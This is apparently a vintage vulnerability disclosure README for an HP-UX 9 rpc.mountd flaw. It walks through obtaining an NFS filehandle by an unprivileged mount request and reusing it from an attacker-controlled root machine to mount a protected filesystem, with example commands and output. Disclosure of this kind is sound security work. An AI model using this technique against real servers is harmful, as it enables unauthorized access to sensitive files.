This little program demonstrates how to exploit a security hole in the
HP-UX 9 rpc.mountd program.  The HP-UX mountd gives filehandles out to
unprivileged mount requests.  Most operating systems allow this
only with the "-n" option to mountd.  However, in HP-UX the "-n"


option means something completely different, and there is no way to
disable unprivileged mounts.

Suppose an intruder starts from machine "evil" (which is his machine,
or on which he has obtained root privileges).  Then suppose the
intruder has a non-root account on machine "client" which nfs mounts
filesystem /sensitive from a machine called "server".

As an unprivileged user, the intruder logs into client and types:

client% ./mnt server:/sensitive
nfs port = 2049
fh = axxxxxxx-bxxxxxxx-cxxxxxxx-dxxxxxxx-exxxxxxx-fxxxxxxx-gxxxxxxx-hxxxxxxx

He has obtained the filehandle with an unprivileged mount request.
Then the intruder returns to evil, where he already has root


privileges.  As root, he types (copying the actual filehandle from the
previous command):

evil# ./mnt server:/sensitive axxxxxxx-bxxxxxxx-cxxxxxxx-dxxxxxxx-exxxxxxx-fxxxxxxx-gxxxxxxx-hxxxxxxx
nfs port = 2049
fh = axxxxxxx-bxxxxxxx-cxxxxxxx-dxxxxxxx-exxxxxxx-fxxxxxxx-gxxxxxxx-hxxxxxxx

Even though machine evil does not have mount permissions on
server:/sensitive, the intruder has managed to mount that filesystem
on his own machine.  Since he can be any user on his own machine, the
intruder can access any files not owned by root on the sensitive
filesystem.

Alternatively, the user could use a user-level NFS client program such
as nfsmenu to make arbitrary NFS requests even from machines on which


he did not have root privileges.

David Mazieres
dm@das.harvard.edu
